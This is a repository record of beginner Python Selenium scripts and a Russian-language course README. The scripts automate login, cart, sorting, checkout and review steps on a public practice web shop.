5d8633c6fdca8e00a045994f7e2e6ec81eeca7bc
89da3a5b50a03a361356ee76b6fdeda0774cd3b0
refs/heads/master
2023-07-24T14:56:43.665159
2021-09-06T08:34:58
2021-09-06T08:34:58
403,333,114
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7079045176506042, "alphanum_fraction": 0.7264721393585205, "avg_line_length": 37.46938705444336, "blob_id": "43d22a4398fbe7ebe4ca4533948803542ff59c55", "content_id": "70a4666586dfcd6d8b0a6754a4c1bb1e028eb593", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9627, "license_type": "no_license", "max_line_length": 148, "num_lines": 245, "path": "/shop.py", "repo_name": "iamgalina/book_store_tests", "src_encoding": "UTF-8", "text": "import time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.chrome.options import Options\n\n#блокировка рекламы\npath_to_extension = r'C:\\Users\\Asus\\AppData\\Local\\Google\\Chrome\\User Data\\Profile 2\\Extensions\\gighmmpiobklfepjocnamgkkbiglidom\\4.35.0_0'\nchrome_options = Options()\nchrome_options.add_argument('load-extension='+path_to_extension)\ndriver = webdriver.Chrome(chrome_options=chrome_options)\ndriver.create_options()\ntime.sleep(10)\ndriver.maximize_window()\ndriver.implicitly_wait(10)\nfirst_tab = driver.window_handles[0]\ndriver.switch_to.window(first_tab)\n\n#отображение страницы товара\ndriver.get(\"http://practice.automationtesting.in/\")\n#LOGIN\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nlogin = driver.find_element(By.ID, \"username\")\nlogin.send_keys(\"[email protected]\")\npswd = driver.find_element(By.ID, \"password\")\npswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nlog_btn = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login > div.u-column1.col-1 > form > p:nth-child(3) > input.woocommerce-Button.button\"))\n)\nlog_btn.click()\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\n\nhtml5_book = wait.until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"content\"]/ul/li[3]/a[1]'))\n)\nhtml5_book.click()\nbook_name = driver.find_element(By.CSS_SELECTOR,'#product-181 h1')\nassert book_name.text == 'HTML5 Forms'\ndriver.quit()\n\n#количество товаров в категории\ndriver.get(\"http://practice.automationtesting.in/\")\n#LOGIN\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nlogin = driver.find_element(By.ID, \"username\")\nlogin.send_keys(\"[email protected]\")\npswd = driver.find_element(By.ID, \"password\")\npswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nlog_btn = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login > div.u-column1.col-1 > form > p:nth-child(3) > input.woocommerce-Button.button\"))\n)\nlog_btn.click()\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\nhtml_btn = driver.find_element(By.CSS_SELECTOR, '#woocommerce_product_categories-2 .cat-item-19 > a')\nhtml_btn.click()\nassert len(driver.find_elements_by_class_name(\"product\")) == 3\ndriver.quit()\n\n#сортировка товаров\ndriver.get(\"http://practice.automationtesting.in/\")\n#LOGIN\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nlogin = driver.find_element(By.ID, \"username\")\nlogin.send_keys(\"[email protected]\")\npswd = driver.find_element(By.ID, \"password\")\npswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nlog_btn = wait.until(\n 
EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login > div.u-column1.col-1 > form > p:nth-child(3) > input.woocommerce-Button.button\"))\n)\nlog_btn.click()\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\n\nsort_actual = driver.find_element(By.CSS_SELECTOR, '[selected=\"selected\"]')\nassert sort_actual.get_attribute('value') == 'menu_order'\nsort = driver.find_element(By.CSS_SELECTOR, '#content select')\nselect = Select(sort)\nselect.select_by_value('price-desc')\n\nsort_actual = driver.find_element(By.CSS_SELECTOR, '[selected=\"selected\"]')\nassert sort_actual.get_attribute('value') == 'price-desc'\ndriver.quit()\n\n#отображение, скидка товара\ndriver.get(\"http://practice.automationtesting.in/\")\n#LOGIN\ndriver.get(\"http://practice.automationtesting.in/\")\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nlogin = driver.find_element(By.ID, \"username\")\nlogin.send_keys(\"[email protected]\")\npswd = driver.find_element(By.ID, \"password\")\npswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nlog_btn = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login > div.u-column1.col-1 > form > p:nth-child(3) > input.woocommerce-Button.button\"))\n)\nlog_btn.click()\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\nandoid_book = driver.find_element(By.XPATH, '//*[@id=\"content\"]/ul/li[1]/a[1]')\nandoid_book.click()\nold_price = driver.find_element(By.CSS_SELECTOR,\"#product-169 > .summary > div:nth-child(2) > p > del > span\")\nassert old_price.text == \"₹600.00\"\nactual_price = driver.find_element(By.CSS_SELECTOR,\"#product-169 > .summary > div:nth-child(2) > p > ins > span\")\nassert actual_price.text == \"₹450.00\"\nandroid_picture = driver.find_element(By.CSS_SELECTOR, \"#product-169 > div.images > a > img\")\nandroid_picture.click()\nclose_btn = wait.until(\n EC.element_to_be_clickable((By.CLASS_NAME, \"pp_close\"))\n\n)\nclose_btn.click()\n\ndriver.quit()\n\n#проверка цены в корзине\ndriver.get('http://practice.automationtesting.in/')\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\nHTML5_WAD_add_btn = driver.find_element(By.CSS_SELECTOR, '[data-product_id=\"182\"]')\nHTML5_WAD_add_btn.click()\ncart_items_not_null = WebDriverWait(driver,10).until_not(\n EC.text_to_be_present_in_element((By.CLASS_NAME, 'cartcontents'), '0 Items')\n)\ncart_items = driver.find_element(By.CLASS_NAME, 'cartcontents')\nassert cart_items.text == '1 Item'\nsum_amount = driver.find_element(By.CSS_SELECTOR, '#wpmenucartli span.amount')\nprice_in_cart = sum_amount.text\nassert price_in_cart == '₹180.00'\ncart = driver.find_element(By.CSS_SELECTOR, '#wpmenucartli > a')\ncart.click()\nwait = WebDriverWait(driver, 5)\nwait.until(\n EC.text_to_be_present_in_element((By.CLASS_NAME, 'cart-subtotal'), price_in_cart)\n)\n#этот тест не прходит для России, т.к. 
есть комиссия\n# wait.until(\n# EC.text_to_be_present_in_element((By.CLASS_NAME, 'order-total'), price_in_cart)\n# )\n\ndriver.quit()\n\n# работа в корзине\ndriver.get('http://practice.automationtesting.in/')\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\ndriver.execute_script('window.scrollBy(0,300);')\nHTML5_WAD_add_btn = driver.find_element(By.CSS_SELECTOR, '[data-product_id=\"182\"]')\nHTML5_WAD_add_btn.click()\ntime.sleep(3)\nJS_DSaA_add_btn = driver.find_element(By.CSS_SELECTOR, '[data-product_id=\"180\"]')\nJS_DSaA_add_btn.click()\ntime.sleep(3)\ncart = driver.find_element(By.CSS_SELECTOR, '#wpmenucartli > a')\ncart.click()\ntime.sleep(5)\ndelete_first_item = driver.find_element(By.CSS_SELECTOR, '#page-34 tbody>.cart_item:nth-child(1)>.product-remove>a')\ndelete_first_item.click()\nundo_btn = driver.find_element(By.CSS_SELECTOR, '#page-34 .woocommerce-message > a')\nundo_btn.click()\nquantity_JS_book = driver.find_element(By.CSS_SELECTOR, '#page-34 tbody > tr:nth-child(1) >.product-quantity input')\nquantity_JS_book.clear()\nquantity_JS_book.send_keys('3')\nupdate_btn = driver.find_element(By.NAME, 'update_cart')\nupdate_btn.click()\nassert quantity_JS_book.get_attribute('value') == '3'\ntime.sleep(3)\napply_coupon_btn = driver.find_element(By.NAME, 'apply_coupon')\napply_coupon_btn.click()\nwait =WebDriverWait(driver,10)\nwarning_msg = wait.until(\n EC.text_to_be_present_in_element((By.CLASS_NAME, 'woocommerce'), 'Please enter a coupon code.')\n)\nif warning_msg is not True:\n print('No warning message')\n\ndriver.quit()\n\n#покупка товара\ndriver.get('http://practice.automationtesting.in/')\nshop = driver.find_element(By.CSS_SELECTOR, \"#menu-item-40 > a\")\nshop.click()\ndriver.execute_script('window.scrollBy(0,300);')\nHTML5_WAD_add_btn = driver.find_element(By.CSS_SELECTOR, '[data-product_id=\"182\"]')\nHTML5_WAD_add_btn.click()\ntime.sleep(3)\ncart = driver.find_element(By.CSS_SELECTOR, '#wpmenucartli > a')\ncart.click()\nwait = WebDriverWait(driver,5)\nCheckout_btn = wait.until(\n EC.element_to_be_clickable((By.CLASS_NAME, 'checkout-button'))\n)\nCheckout_btn.click()\nwait.until(\n EC.url_to_be('http://practice.automationtesting.in/checkout/')\n)\nfirst_name = driver.find_element(By.ID, 'billing_first_name')\nfirst_name.send_keys('Galina')\nlast_name = driver.find_element(By.ID, 'billing_last_name')\nlast_name.send_keys('Fedorova')\nemail = driver.find_element(By.ID, 'billing_email')\nemail.send_keys('[email protected]')\nphone = driver.find_element(By.ID, 'billing_phone')\nphone.send_keys('89991234567')\ncountry_selector = driver.find_element(By.ID, 's2id_billing_country')\ncountry_selector.click()\ntime.sleep(1)\ncountry_enter = driver.find_element(By.ID, 's2id_autogen1_search')\ncountry_enter.send_keys('Russia')\ncountry_srch_result = driver.find_element(By.ID, 'select2-results-1')\ncountry_srch_result.click()\nadress = driver.find_element(By.ID, 'billing_address_1')\nadress.send_keys('Nevskiy prospect')\ncity = driver.find_element(By.ID, 'billing_city')\ncity.send_keys('Saint-Petersburg')\nstate = driver.find_element(By.ID, 'billing_state')\nstate.send_keys('Saint-Petersburg')\npostcode = driver.find_element(By.ID, 'billing_postcode')\npostcode.send_keys('177888')\ndriver.execute_script('window.scrollBy(0,600);')\ntime.sleep(3)\ncheck_payments = driver.find_element(By.ID,'payment_method_cheque')\ncheck_payments.click()\nplace_order_btn = driver.find_element(By.ID, 'place_order')\nplace_order_btn.click()\nthanks_text_check = 
wait.until(\n EC.text_to_be_present_in_element((By.ID, 'body'),'Thank you. Your order has been received.')\n)\npayment_method_check = wait.until(\n EC.text_to_be_present_in_element((By.CSS_SELECTOR, '#page-35 tfoot > tr:nth-child(3) > td'), 'Check Payments')\n)\n\ndriver.quit()\n" }, { "alpha_fraction": 0.7213872671127319, "alphanum_fraction": 0.7421965599060059, "avg_line_length": 33.63999938964844, "blob_id": "7877d9df55d61d6e8bd0172497d334e1fe9d2313", "content_id": "2b5f977cec2c615b1f57581ee22e713a421cb7c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 865, "license_type": "no_license", "max_line_length": 109, "num_lines": 25, "path": "/home.py", "repo_name": "iamgalina/book_store_tests", "src_encoding": "UTF-8", "text": "import time\nfrom selenium import webdriver\ndriver = webdriver.Chrome()\ndriver.maximize_window()\nfrom selenium.webdriver.common.by import By\ndriver.implicitly_wait(5)\n\ndriver.get(\"http://practice.automationtesting.in/\")\ndriver.execute_script(\"window.scrollBy(0,600);\")\nRuby_book = driver.find_element(By.CSS_SELECTOR, \"#text-22-sub_row_1-0-2-0-0 .woocommerce-LoopProduct-link\")\nRuby_book.click()\nReview = driver.find_element(By.CSS_SELECTOR, \"#product-160 li.reviews_tab > a\")\nReview.click()\nStar_5 = driver.find_element(By.CLASS_NAME, \"star-5\")\nStar_5.click()\nReview_text = driver.find_element(By.ID,\"comment\")\nReview_text.send_keys(\"Nice Book!\")\nName = driver.find_element(By.ID, \"author\")\nName.send_keys(\"Galina\")\nemail = driver.find_element(By.ID, \"email\")\nemail.send_keys(\"[email protected]\")\nsubmit = driver.find_element(By.ID, \"submit\")\nsubmit.click()\n\ndriver.quit()" }, { "alpha_fraction": 0.7323750853538513, "alphanum_fraction": 0.7412731051445007, "avg_line_length": 35.54999923706055, "blob_id": "36cf108b4c1b21f300174a7d915bf012b24bb6b2", "content_id": "71614dfc328e18a832598687e749dfe5380e5719", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1486, "license_type": "no_license", "max_line_length": 148, "num_lines": 40, "path": "/login_registation.py", "repo_name": "iamgalina/book_store_tests", "src_encoding": "UTF-8", "text": "import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\ndriver = webdriver.Chrome()\ndriver.maximize_window()\ndriver.implicitly_wait(10)\n\ndriver.get(\"http://practice.automationtesting.in/\")\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nreg_email = driver.find_element(By.ID, \"reg_email\")\nreg_email.send_keys(\"[email protected]\")\nreg_pswd = driver.find_element(By.ID, \"reg_password\")\nreg_pswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nregister = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login p.woocomerce-FormRow.form-row > input.woocommerce-Button.button\"))\n )\nregister.click()\ndriver.quit()\n\ndriver.get(\"http://practice.automationtesting.in/\")\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nlogin = driver.find_element(By.ID, \"username\")\nlogin.send_keys(\"[email protected]\")\npswd = driver.find_element(By.ID, \"password\")\npswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nlog_btn = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login > 
div.u-column1.col-1 > form > p:nth-child(3) > input.woocommerce-Button.button\"))\n)\nlog_btn.click()\n#Проверка, что на странице есть Logout\nlogout = driver.find_element(By.LINK_TEXT, \"Logout\")\nassert logout.text == 'Logout'\ndriver.quit()" }, { "alpha_fraction": 0.7318676114082336, "alphanum_fraction": 0.7558929920196533, "avg_line_length": 45.44210433959961, "blob_id": "a0e46760d2a95d27a9151109af2722548cf32236", "content_id": "880688f3f638c6cfe4aeb361c4eb2353fd36ae98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6699, "license_type": "no_license", "max_line_length": 115, "num_lines": 95, "path": "/README.md", "repo_name": "iamgalina/book_store_tests", "src_encoding": "UTF-8", "text": "# Задание по курсу \"Основы автоматизации тестирования на Python с помощью Selenium\"\n### Шаги, по которым был написан код:\n* Home: добавление комментария\n> 1. Откройте http://practice.automationtesting.in/\n> 2. Проскролльте страницу вниз на 600 пикселей\n> 3. Нажмите на название книги \"Selenium Ruby\" или на кнопку \"READ MORE\"\n> 4. Нажмите на вкладку \"REVIEWS\"\n> 5. Поставьте 5 звёзд\n> 6. Заполните поле \"Review\" сообщением : \"Nice book!\"\n> 7. Заполните поле \"Name\"\n> 8. Заполните \"Email\"\n> 9. Нажмите на кнопку \"SUBMIT\"\n\n* Registration_login: регистрация аккаунта\n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tНажмите на вкладку \"My Account Menu\"\n> 3.\tВ разделе \"Register\", введите email для регистрации\n> 4.\tВ разделе \"Register\", введите пароль для регистрации \\n\n>> * составьте такой пароль, чтобы отобразилось \"Medium\" или \"Strong\", иначе регистрация не выполнится\n> 5.\tНажмите на кнопку \"Register\"\n\n* Registration_login: логин в систему\n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tНажмите на вкладку \"My Account Menu\"\n> 3.\tВ разделе \"Login\", введите email для логина #данные можно взять из предыдущего теста\n> 4.\tВ разделе \"Login\", введите пароль для логина\t#данные можно взять из предыдущего теста\n> 5.\tНажмите на кнопку \"Login\"\n> 6.\tДобавьте проверку, что на странице есть элемент \"Logout\"\n\n* Shop: отображение страницы товара \n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tЗалогиньтесь\n> 3.\tНажмите на вкладку \"Shop\"\n> 4.\tОткройте книгу \"HTML 5 Forms\"\n> 5.\tДобавьте тест, что заголовок книги назвается: \"HTML5 Forms\"\n\n* Shop: количество товаров в категории\n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tЗалогиньтесь\n> 3.\tНажмите на вкладку \"Shop\"\n> 4.\tОткройте категорию \"HTML\"\n> 5.\tДобавьте тест, что отображается три товара\n\n* Shop: сортировка товаров\n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tЗалогиньтесь\n> 3.\tНажмите на вкладку \"Shop\"\n> 4.\tДобавьте тест, что в селекторе выбран вариант сортировки по умолчанию\n> 5.\tОтсортируйте товары от большего к меньшему\n> 6.\tСнова объявите переменную с локатором основного селектора сортировки #т.к после сортировки страница обновится\n> 7.\tДобавьте тест, что в селекторе выбран вариант сортировки от большего к меньшему\n\n* Shop: отображение, скидка товара\n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tЗалогиньтесь\n> 3.\tНажмите на вкладку \"Shop\"\n> 4.\tОткройте книгу \"Android Quick Start Guide\"\n> 5.\tДобавьте тест, что содержимое старой цены = \"₹600.00\"\t\n> 6.\tДобавьте тест, что содержимое новой цены = \"₹450.00\"\t\n> 7.\tДобавьте явное ожидание и нажмите на обложку книги\n> 8.\tДобавьте явное ожидание и 
закройте предпросмотр нажав на крестик (кнопка вверху справа)\n\n* Shop: проверка цены в корзине\n> 1.\tОткройте http://practice.automationtesting.in/\t\n> 2.\tНажмите на вкладку \"Shop\"\n> 3.\tДобавьте в корзину книгу \"HTML5 WebApp Development\"\t\n> 4.\tДобавьте тест, что в возле коризны(вверху справа) количество товаров = \"1 Item\", а стоимость = \"₹180.00\"\n> 5.\tПерейдите в корзину\n> 6.\tИспользуя явное ожидание, проверьте что в Subtotal отобразилась стоимость\n> 7.\tИспользуя явное ожидание, проверьте что в Total отобразилась стоимость\n\n* Shop: работа в корзине\n> 1.\tОткройте http://practice.automationtesting.in/\t\n> 2.\tНажмите на вкладку \"Shop\"\n> 3.\tДобавьте в корзину книги \"HTML5 WebApp Development\" и \"JS Data Structures and Algorithm\"\n> 4.\tПерейдите в корзину\n> 5.\tУдалите первую книгу\n> 6.\tНажмите на Undo (отмена удаления)\n> 7.\tВ Quantity увеличьте количесто товара до 3 шт для \"JS Data Structures and Algorithm“\n> 8.\tНажмите на кнопку \"UPDATE BASKET\"\n> 9.\tДобавьте тест, что value элемента quantity для \"JS Data Structures and Algorithm\" равно 3\t# используйте assert\n> 10.\tНажмите на кнопку \"APPLY COUPON\"\n> 11.\tДобавьте тест, что возникло сообщение: \"Please enter a coupon code.\"\n\n* Shop: покупка товара\n> 1.\tОткройте http://practice.automationtesting.in/\t# в этом тесте логиниться не нужно\n> 2.\tНажмите на вкладку \"Shop\" и проскролльте на 300 пикселей вниз\n> 3.\tДобавьте в корзину книгу \"HTML5 WebApp Development\"\n> 4.\tПерейдите в корзину\n> 5.\tНажмите \"PROCEED TO CHECKOUT\"\n> 6.\tЗаполните все обязательные поля\n> 7.\tВыберите способ оплаты \"Check Payments\"\n> 8.\tНажмите PLACE ORDER\n> 9.\tИспользуя явное ожидание, проверьте что отображается надпись \"Thank you. Your order has been received.\"\n> 10.\tИспользуя явное ожидание, проверьте что в Payment Method отображается текст \"Check Payments\"\n" } ]
4
wanwey/bsmsystem
https://github.com/wanwey/bsmsystem
637dd3dc071ae3d38c14811b42a5853ef567731b
d316a3ca84c2edfb245941ace3a6dc86f9d9c4b2
901cd1d09a725a283735471ab601626e7befb3ab
refs/heads/master
2018-10-12T17:21:46.739420
2018-07-18T03:20:58
2018-07-18T03:20:58
140,454,755
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7286821603775024, "alphanum_fraction": 0.7286821603775024, "avg_line_length": 20.66666603088379, "blob_id": "e6fec2e73d47889e80625880d9fdcd5912815066", "content_id": "a8b9fa7e4b0d0d3c4a78bcdbad08a8b985c903ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 61, "num_lines": 6, "path": "/backend/urls.py", "repo_name": "wanwey/bsmsystem", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('getassetdata', views.getassetdata, name='getdata'),\n]" }, { "alpha_fraction": 0.7535934448242188, "alphanum_fraction": 0.755646824836731, "avg_line_length": 29.4375, "blob_id": "5ee6ed8b6a7863837b4e65ead6bf4fc2e5c110e5", "content_id": "bdb6ecab2dfb6ab5bc2ff3a8e603a8dfc5906287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 487, "license_type": "no_license", "max_line_length": 69, "num_lines": 16, "path": "/backend/views.py", "repo_name": "wanwey/bsmsystem", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom backend import models\nimport json\nfrom django.http import JsonResponse\nfrom rest_framework import serializers\n\n# def index(request):\n# return HttpResponse(\"Hello, world. You're at the polls index.\")\n\ndef getassetdata(request):\n result = models.bs_asset.objects.all()\n # filter(v_assetstate_id=1)\n result = serializers.serialize(\"json\", result)\n return result\n # return JsonResponse(result)\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7373272180557251, "avg_line_length": 23.22222137451172, "blob_id": "a137db9443ebae19c44b2a7d50903ba328edfb3e", "content_id": "8857a2971ddeda2a1f3fa48eec05491828eaf433", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 53, "num_lines": 9, "path": "/backend/models.py", "repo_name": "wanwey/bsmsystem", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\n\n\nclass bs_asset(models.Model):\n id = models.AutoField\n assetcode = models.CharField(max_length=255)\n v_assetstate_id = models.IntegerField(default=75)" } ]
3
OpenUpSA/pa-hotness
https://github.com/OpenUpSA/pa-hotness
60c441a5d804d4617bf81d04c5a37097711d5069
40a9b55fbc76139348c1f7287665c2585935e71d
f2fd9f4487eca43409fde69cd97b3f2f1df41f3c
refs/heads/master
2023-04-27T18:32:25.802069
2014-04-11T05:18:39
2014-04-11T05:18:39
18,554,862
0
0
Apache-2.0
2014-04-08T10:55:02
2017-05-24T14:08:48
2023-04-15T18:48:00
Python
[ { "alpha_fraction": 0.7236841917037964, "alphanum_fraction": 0.7236841917037964, "avg_line_length": 37.5, "blob_id": "0f99959adadbf2f04e9c532e2528b200f20cb691", "content_id": "90dc81132bee4a0d21ae4ab77bc90f80843ce459", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 76, "license_type": "permissive", "max_line_length": 63, "num_lines": 2, "path": "/instance/config.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "DEBUG = True\nSQLALCHEMY_DATABASE_URI = 'sqlite:///../instance/pa-hotness.db'" }, { "alpha_fraction": 0.6226269006729126, "alphanum_fraction": 0.6292135119438171, "avg_line_length": 24.81999969482422, "blob_id": "d3f930255756bc52acb565177983b610add5368b", "content_id": "03132e7a30277ab37c533024b799d40fe5c03267", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2581, "license_type": "permissive", "max_line_length": 118, "num_lines": 100, "path": "/backend/views.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "from flask import Flask, jsonify, abort\nimport json\nfrom random import randint\nfrom operator import itemgetter\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import func\n\n\napp = Flask(__name__, instance_relative_config=True)\napp.config.from_pyfile('config.py', silent=True)\ndb = SQLAlchemy(app)\n\nfrom models import MemberOfParliament\n\n\ndef send_api_response(data_dict):\n\n response = jsonify(data_dict)\n response.headers['Access-Control-Allow-Origin'] = \"*\"\n return response\n\n\[email protected]('/')\ndef route():\n links = [\n '<a href=\"/get_member/male/\">/get_member/male/</a>',\n '<a href=\"/get_member/female/\">/get_member/female/</a>',\n '<a href=\"/hot/pamela-tshwete/\">/hot/pamela-tshwete/</a>',\n '<a href=\"/not/pamela-tshwete/\">/not/pamela-tshwete/</a>',\n '<a href=\"/ranking/\">/ranking/</a>'\n ]\n return \"<br>\".join(links)\n\n\[email protected]('/get_member/<gender>/')\ndef get_member(gender):\n \"\"\"\n Return the details of a randomly selected member of parliament.\n \"\"\"\n\n if not gender.lower() in [\"male\", \"female\"]:\n abort(400)\n\n gender_key = \"M\"\n if gender.lower() == \"female\":\n gender_key = \"F\"\n\n\n mp = MemberOfParliament.query.filter_by(gender=gender_key).order_by(func.random()).first()\n return send_api_response(mp.as_dict())\n\n\[email protected]('/hot/<mp_key>/')\ndef hot(mp_key):\n \"\"\"\n Increment the score for an MP.\n \"\"\"\n\n try:\n mp = MemberOfParliament.query.filter_by(key=mp_key).first()\n mp.score += 1\n except AttributeError:\n abort(404)\n db.session.add(mp)\n db.session.commit()\n return send_api_response(mp.as_dict())\n\n\[email protected]('/not/<mp_key>/')\ndef not_hot(mp_key):\n \"\"\"\n Decrement the score for an MP.\n \"\"\"\n\n try:\n mp = MemberOfParliament.query.filter_by(key=mp_key).first()\n mp.score -= 1\n except AttributeError:\n abort(404)\n db.session.add(mp)\n db.session.commit()\n return send_api_response(mp.as_dict())\n\[email protected]('/ranking/')\ndef ranking():\n \"\"\"\n Return the 10 highest ranked MP's of each gender.\n \"\"\"\n\n top_males = []\n top_females = []\n\n males = MemberOfParliament.query.filter_by(gender=\"M\").order_by(MemberOfParliament.score.desc()).limit(10).all()\n for mp in males:\n top_males.append(mp.as_dict())\n females = MemberOfParliament.query.filter_by(gender=\"F\").order_by(MemberOfParliament.score.desc()).limit(10).all()\n for mp in 
females:\n top_females.append(mp.as_dict())\n\n return send_api_response({\"male\": top_males, \"female\": top_females})" }, { "alpha_fraction": 0.6643990874290466, "alphanum_fraction": 0.6780045628547668, "avg_line_length": 32.92307662963867, "blob_id": "ba3ede07fbf641f53ed6d6e0d1642803bd035881", "content_id": "4f026bd29b02e0af1f2ef741d0646018de680b5b", "detected_licenses": [ "Apache-2.0", "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 441, "license_type": "permissive", "max_line_length": 91, "num_lines": 13, "path": "/frontend/controllers.js", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "var HotOrNotApp = angular.module(\"HotOrNotApp\", []);\n\nHotOrNotApp.controller(\"sexController\", function($scope) {\n\t$scope.sex = \"Men\";\n});\n\nHotOrNotApp.controller(\"peepsController\", function($scope, $http) {\n\t$http.get('http://hot-or-not-api.demo4sa.org/get_member/male/').success(function(peep1) {\n\t\t$http.get('http://hot-or-not-api.demo4sa.org/get_member/male/').success(function(peep2) {\n\t\t\t$scope.peeps = [ peep1, peep2 ];\n\t\t});\n\t});\n});\n" }, { "alpha_fraction": 0.7603305578231812, "alphanum_fraction": 0.7603305578231812, "avg_line_length": 30, "blob_id": "9b78f99a9662916322d18a29cb6b68f4db1d0fe4", "content_id": "df9e00ca96640b18c58387082fc2f5b5bcb9a491", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1210, "license_type": "permissive", "max_line_length": 119, "num_lines": 39, "path": "/README.md", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "pa-hotness\n================\n\n\"Hot or Not\" style app for getting to know your representatives in parliament. Information on candidates comes from the\nPeople's Assembly website at http://www.pa.org.za/organisation/national-assembly/people/\n\n\n## What does this project do\n\nLet people discover more information about their representatives in parliament, by having them rate parliamentarians.\nThe user is repeatedly confronted by a random parliamentarian's information, and asked to decide whether that\nparliamentarian is \"Hot\" or \"Not\".\n\nIn this way, parliamentarians are ranked, and the rankings are displayed on a different screen.\n\n## How it works\n\nThe frontend is ...\n\nThe backend exposes a couple of API endpoints, and a little Admin interface for managing the site's data.\n\n## Contributing to the project\n\nThis project is open-source, and anyone is welcome to contribute. 
If you just want to make us aware of a bug / make\na feature request, then please add a new GitHub Issue (if a similar one does not already exist).\n\nIf you want to contribute to the code, please fork the repository, make your changes, and create a pull request.\n\n### Local setup\n\n...\n\n### Deploy instructions\n\n...\n\n### Maintenance\n\n...\n\n" }, { "alpha_fraction": 0.6027397513389587, "alphanum_fraction": 0.6125244498252869, "avg_line_length": 23.35714340209961, "blob_id": "db575e357ee305327c0c68fba8cac2149a17a916", "content_id": "4fb96c187b36f30629ed11c0dc8d99927b2c5cdb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1022, "license_type": "permissive", "max_line_length": 99, "num_lines": 42, "path": "/rebuild_db.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "import json\nimport csv\nfrom backend.views import db\nfrom backend.models import MemberOfParliament\n\n\ndef unicode_csv_reader(utf8_data, dialect=csv.excel, **kwargs):\n \"\"\"\n Handles special characters.\n Courtesy Alex Martelli (http://stackoverflow.com/questions/904041/reading-a-utf8-csv-file-with-python)\n \"\"\"\n csv_reader = csv.reader(utf8_data, dialect=dialect, **kwargs)\n for row in csv_reader:\n yield [unicode(cell, 'utf-8') for cell in row]\n\n\ndef parse_scraper_data():\n \"\"\"\n Read input data file, and save as a pickle.\n \"\"\"\n\n mp_list = []\n with 